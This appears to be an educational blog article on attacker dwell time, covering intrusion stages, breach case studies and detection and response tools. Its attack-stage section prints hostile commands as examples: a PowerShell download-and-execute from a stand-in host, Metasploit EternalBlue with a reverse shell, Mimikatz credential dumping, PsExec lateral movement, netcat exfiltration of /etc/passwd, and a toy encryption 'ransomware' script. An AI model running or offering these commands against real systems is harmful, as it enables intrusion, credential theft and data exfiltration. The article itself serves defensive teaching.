Dwell Time: the silent cyber security threat 

Table of contents

• What is Dwell Time in cyber security? 
• The stages of Dwell Time 
• The consequences of a long Dwell Time 
• How to reduce Dwell Time 

---

What is Dwell Time in cyber security? 

Dwell Time is one of the most critical risk indicators in cyber security. It refers to the time between an attacker gaining unauthorized access to a system and the moment their presence is detected and removed.

The longer this period, the more opportunities the attacker has to move laterally, exfiltrate sensitive data, and compromise critical systems. 

One of the most alarming facts about Dwell Time is that it is often measured in days or even months. According to the M-Trends Report by Mandiant, the average Dwell Time for cyber intrusions in 2023 was 16 days, but in some cases, it exceeded 100 days. 

For companies and organizations, Dwell Time is a crucial issue because an attacker’s extended presence increases the potential damage. Understanding its stages, consequences, and how to reduce it is essential for improving cyber security posture. 

The stages of Dwell Time 

Dwell Time is the period an attacker remains undetected within a compromised system. During this time, the attacker performs various operations, from initial intrusion to persistence to data exfiltration or system sabotage.

Let us now look at the main steps in this process, with real examples and attack techniques used.

Initial intrusion 

The attacker gains access to a system by exploiting vulnerabilities or using stolen credentials. This can happen through: 

• Phishing
  Sending fraudulent emails with malicious attachments or links. 

• Zero-day exploits
  Exploiting unpatched software vulnerabilities. 

• Brute force and credential stuffing
  Automated attempts to break weak passwords. 

• Malware infection
  Deploying trojans, keyloggers, or rootkits for remote access. 

Example: phishing attack with PowerShell payload 

An attacker might send an email containing an Excel attachment with a malicious macro. When the victim enables macros, a PowerShell script downloads and executes a payload. 

Malicious PowerShell script executed via macro: 

powershell 

$wc = New-Object System.Net.WebClient 

$url = "http://malicious-site.com/payload.exe" 

$file = "$env:APPDATA\payload.exe" 

$wc.DownloadFile($url, $file) 

Start-Process $file

This script downloads and runs a malicious file, granting the attacker remote access. 

Example: Exploiting SMB with EternalBlue 

An attacker could exploit a vulnerability in SMB file sharing services (such as EternalBlue, an exploit used by WannaCry).

Example of a Metasploit command to exploit EternalBlue on Windows:

bash 

use exploit/windows/smb/ms17_010_eternalblue 

set RHOSTS 192.168.1.100 

set PAYLOAD windows/meterpreter/reverse_tcp 

set LHOST 192.168.1.200 

exploit

If successful, the attacker gains a Meterpreter shell, allowing full remote control of the target system. 

Persistence and lateral movement 

Once inside, the attacker aims to maintain access and expand control over the network. Common techniques include: 

• Backdoors
  Creating hidden entry points to retain access. 

• Privilege escalation
  Gaining administrative privileges for deeper access. 

• Credential theft
  Using tools like Mimikatz to extract login credentials. 

• Lateral movement
  Using stolen credentials to access other systems. 

Example: credential dumping with Mimikatz 

An attacker can run Mimikatz on a compromised machine to extract passwords from memory: 

powershell 

privilege::debug 

sekurlsa::logonpasswords

This command reveals plaintext passwords or NTLM hashes, allowing the attacker to perform pass-the-hash or pass-the-ticket attacks. 

Example: lateral movement with PsExec 

Once the attacker obtains admin credentials, they can use PsExec to execute commands on another machine: 

bash 

psexec \\192.168.1.101 -u Administrator -p password cmd.exe

This opens a remote shell on the targeted system, enabling further exploitation. 

Data exfiltration and impact 

At this stage, the attacker has full control and can steal data, deploy ransomware, or sabotage the system. Techniques include: 

• Data exfiltration
  Sending stolen files to an external server. 

• Ransomware deployment
  Encrypting critical files and demanding payment. 

• System destruction
  Deleting backups and wiping disks to cause irreparable damage. 

Example: data exfiltration Using Netcat 

An attacker can use Netcat to transfer stolen files to a remote server: 

bash 

nc -w 3 192.168.1.200 4444 < /etc/passwd

On the attacker’s server, they listen for incoming data: 

bash 

nc -lvp 4444 > stolen_data.txt

Example: ransomware encryption script (Python) 

A simple Python ransomware script can encrypt files using AES encryption: 

python 

from cryptography.fernet import Fernet 

# Generate an encryption key 

key = Fernet.generate_key() 

cipher = Fernet(key) 

# Encrypt a file 

with open("document.txt", "rb") as file: 

    encrypted_data = cipher.encrypt(file.read()) 

with open("document.txt.enc", "wb") as file: 

    file.write(encrypted_data) 

print("File encrypted. Key:", key.decode())

A real ransomware attack would delete the local key and demand payment for decryption. 

Detection and response 

This phase begins when security teams detect suspicious activity and attempt to mitigate the attack. Common cyber defense actions include: 

• Log analysis
  Investigating SIEM logs to track attacker actions. 

• Threat hunting
  Searching for Indicators of Compromise (IOCs). 

• Threat isolation
  Locking compromised accounts and blocking malicious traffic. 

• System recovery
  Restoring operations and patching vulnerabilities. 

Example: detecting suspicious login attempts in Windows logs 

A security analyst can use PowerShell to scan Windows Event Logs for failed login attempts, which could indicate a brute-force attack. 

powershell 

Get-WinEvent -LogName Security | Where-Object { $_.Id -eq 4625 }

This command identifies failed login attempts, which may indicate brute force or login attempts with stolen credentials.

Example: blocking a malicious IP with IPTables 

If a specific IP is identified as malicious, an administrator can block it using IPTables: 

bash 

iptables -A INPUT -s 203.0.113.45 -j DROP

This prevents further connections from the attacker’s IP. 

The consequences of a long Dwell Time 

A prolonged Dwell Time significantly increases the damage an organization can suffer. The longer an attacker remains undetected within a network, the greater the risk of data theft, financial loss, reputational damage, operational disruption, and attack expansion. 

Below, we analyze these risks with real-world examples:

Data theft and information exposure 

An attacker with extended access to a system can steal sensitive data, including: 

• Customer personal data (names, addresses, credit card numbers, login credentials);

• Confidential corporate information, such as intellectual property and trade secrets;

• Financial and banking records, which can be used for fraud or sold on the dark web. 

Example: Marriott data breach (2014-2018) 

One of the worst examples of prolonged Dwell Time was the Marriott International breach. Attackers remained undetected for four years, exfiltrating data from approximately 500 million customers. 

Stolen data included: 

• Names, passport numbers, credit card details, and contact information;

• Guest reservation history, exposing sensitive travel patterns. 

Impact: 

• Severe reputational damage, as customers lost trust in Marriott’s security;

• A $23.8 million GDPR fine imposed by UK regulators for data protection failures. 

Increased financial impact 

The longer an attack remains undetected, the higher the total cost of the breach. According to IBM’s Cost of a Data Breach Report 2023, breaches with Dwell Times over 200 days cost an average of $4.45 million, while those discovered within 100 days cost about $3.5 million. 

Example: Equifax breach (2017)

In March 2017, Equifax, one of the largest credit reporting agencies, was breached. However, the attack was only detected in July 2017, leading to a Dwell Time of over four months. 

Financial damage: 

• $700 million in fines and compensation payouts;

• 35% stock value loss in a matter of weeks;

• Massive legal and recovery costs to strengthen cyber security infrastructure. 

Stolen data: 

• Personal information of 147 million Americans.
• Social Security numbers, birth dates, driver’s licenses.

Reputational damage 

A company’s reputation can suffer irreparable damage if a breach remains undetected for months or years. Customers and investors lose trust, leading to loss of business and market value. 

Example: Yahoo! and the loss of user trust (2013-2016) 

Between 2013 and 2016, Yahoo! suffered two massive breaches, both with Dwell Times exceeding two years, compromising 3 billion accounts. 

Reputational consequences: 

• Users abandoned Yahoo!, migrating to competitors like Google and Microsoft;

• Verizon reduced Yahoo’s acquisition price by $350 million after discovering the breaches. 

Operational risks

If attackers linger in a system, they can sabotage critical infrastructures, leading to severe business disruptions. This is particularly dangerous in: 

• Energy (power plants, industrial control systems);

• Healthcare (hospitals, emergency services);

• Finance (stock exchanges, online banking systems). 

Example: Colonial Pipeline ransomware attack (2021) 

A ransomware attack on Colonial Pipeline, a critical U.S. fuel supplier, remained undetected for weeks before the malware was activated, shutting down operations. 

Consequences: 

• Complete shutdown of fuel transportation on the U.S. East Coast; 

• $4.4 million ransom paid to attackers (DarkSide group);

• Public panic and fuel shortages, leading to economic and social impacts. 

Attack expansion

If an attacker remains undetected for too long, they can spread deeper into the network, infecting multiple systems and exfiltrating vast amounts of data. 

Example: SolarWinds attack (2019-2020) 

The SolarWinds attack is a textbook case of stealthy, long-term cyber espionage. Attackers inserted malicious code into software Orion, a widely used IT management software. The malware remained undetected for months, spreading through legitimate software updates. 

Attack expansion: 

• Malware was distributed through legitimate software updates;
• The malware infected 18,000 companies and multiple U.S. government agencies. 

• Attackers accessed email systems, classified documents, and corporate secrets. 

Consequences: 

• Massive loss of trust in IT supply chains;

• Millions spent on cyber security overhauls and response efforts;

• Long-term espionage concerns, as sensitive data was compromised. 

How to reduce Dwell Time 

Reducing Dwell Time is one of the most critical challenges in modern cyber security. Once attackers infiltrate a network, they often remain undetected for days, weeks, or even months, increasing the risk of data theft, ransomware deployment, or system sabotage. 

To mitigate this risk, organizations must strengthen their defenses in three key areas: prevention, detection, and response. Below, we explore the most effective strategies with practical examples and real-world applications. 

Continuous monitoring with advanced tools 

One of the most effective ways to reduce Dwell Time is by leveraging real-time threat detection tools. 

EDR (Endpoint Detection and Response) and XDR (Extended Detection and Response) help: 

• Detect suspicious behavior on user devices;

• Analyze attack patterns using AI-driven threat intelligence;

• Correlate events across endpoints, servers, and cloud environments. 

Example: detecting ransomware with EDR 
Consider an organization using Microsoft Defender for Endpoint. If ransomware attempts to encrypt files, the EDR system can detect the abnormal activity and automatically stop the process. 

PowerShell command monitored by EDR: 

powershell 

Get-ChildItem -Path C:\Users -Recurse | ForEach-Object { Encrypt-File $_.FullName }

An EDR system would detect this activity and generate an immediate alert, blocking the action before the files are encrypted.

Active threat hunting 

Relying solely on automated alerts is not enough. Sophisticated attacks can blend into normal network traffic to evade detection. This is why advanced organizations implement Threat Hunting, a proactive search for hidden threats inside their IT infrastructure. 

Threat hunting techniques: 

• Analyzing login logs for anomalies;

• Searching for suspicious network connections using tools like Zeek (formerly Bro) or Wireshark;

• Inspecting running processes on endpoints to detect fileless malware. 

Example: detecting lateral movement with threat hunting 
A SOC analyst could use PowerShell to scan for unusual remote connections: 

powershell 

Get-WinEvent -LogName Security | Where-Object { $_.Id -eq 4624 -and $_.Properties[5].Value -eq "Network" }

If an administrator sees login attempts from an unknown IP address, it could indicate an attacker moving laterally across the network. 

Enhancing network visibility with SIEM and NDR 

• SIEM (Security Information and Event Management)
  Collects and analyzes system logs, access records, security events, and anomalies. 
• NDR (Network Detection and Response)
  Monitors real-time network traffic, detecting unusual activity across protocols. 

Example: detecting lateral movement with SIEM 
A SOC team using Splunk can create a query to find suspicious RDP login attempts between internal servers: 

spl 

index=security_logs source="wineventlog:security" EventCode=4624  

| stats count by Account_Name, IpAddress

If the source IP is unexpected or originates from a foreign location, this could indicate a compromised account being used for lateral movement. 

Strong authentication and Zero Trust

• Multi-Factor Authentication (MFA)
  Even if an attacker steals a password, they cannot access the system without the second authentication factor. 

Zero Trust security model: 

• Never trust, always verify even internal users;

• Every access request is authenticated and authorized based on least privilege principles. 

Example: blocking unauthorized access with Zero Trust 
If a regular employee has never accessed an administrative server before, a Zero Trust system like Okta would automatically block the attempt and require additional MFA verification. 

Patch management and reducing the attack surface 

Attackers often exploit known vulnerabilities to infiltrate systems. Keeping software, operating systems, and firmware updated significantly reduces this risk. 

Example: EternalBlue Exploit and WannaCry attack 
The WannaCry ransomware (2017) exploited the Windows SMBv1 vulnerability (EternalBlue). Microsoft had already released a patch months before, but many companies failed to apply it in time. 

If businesses had implemented a patch management strategy, they could have avoided millions of dollars in damages. 

Automating patch deployment with tools like WSUS, SCCM, or Ansible ensures critical vulnerabilities are patched quickly. 

Employee training and security awareness 

Many cyberattacks begin with human error, such as phishing. If an employee clicks on a malicious email link, an attacker can steal credentials or install malware. 

Cyber security awareness strategies: 

• Simulated phishing attacks to teach employees how to spot threats;

• Training on password security and MFA importance;

• Periodic assessments of security protocols and IT hygiene. 

Example
Blocking Phishing Attacks with DMARC, DKIM, and SPF. A company can configure SPF, DKIM, and DMARC records to prevent attackers from spoofing their email domain. 

DMARC DNS record configuration: 

perl 

_dmarc.example.com TXT "v=DMARC1; p=reject; rua=mailto:security@example.com"

With this setup, unauthorized emails sent from fake company domains are automatically rejected. 

Conclusion 

Dwell Time is a critical cyber security metric: the longer an attacker remains undetected in a system, the greater the potential damage.

Organizations must adopt proactive strategies to reduce it, combining advanced technologies, continuous monitoring, and employee training. Investing in Dwell Time reduction not only enhances security but also minimizes the risk of devastating breaches and their associated costs. 

---

Questions and answers

1. What is Dwell Time in cyber security? 
   Dwell Time is the period between an attacker’s system intrusion and its detection. 

2. Why is a long Dwell Time dangerous? 
   The longer an attacker remains in a system, the more data they can steal and damage they can cause. 

3. What is the average Dwell Time of a cyber attack? 
   According to Mandiant, the average Dwell Time in 2023 was 16 days, but some cases exceeded 100 days. 

4. How can long Dwell Time attacks be detected? 
   EDR, XDR, and SIEM tools help identify suspicious movements and unusual activities. 

5. Which attacks have the longest Dwell Time? 
   Advanced threats like APT (Advanced Persistent Threats) and backdoor-based attacks can last for months. 

6. How can companies reduce Dwell Time? 
   By implementing continuous monitoring, threat hunting, MFA, and Zero Trust security models. 

7. Does Dwell Time affect the cost of a breach? 
   Yes, according to IBM, breaches detected in less than 200 days cost millions less than those with extended Dwell Time. 

8. Which companies are at higher risk of prolonged Dwell Time? 
   Organizations with poor network visibility, outdated systems, and weak defenses. 

9. Do ransomware attacks have a high Dwell Time? 
   It depends—some execute quickly, while others spread within the network before activation. 

10. What happens after detecting an attack with long Dwell Time? 
    A forensic investigation, threat removal, and security reinforcement are required to prevent future intrusions.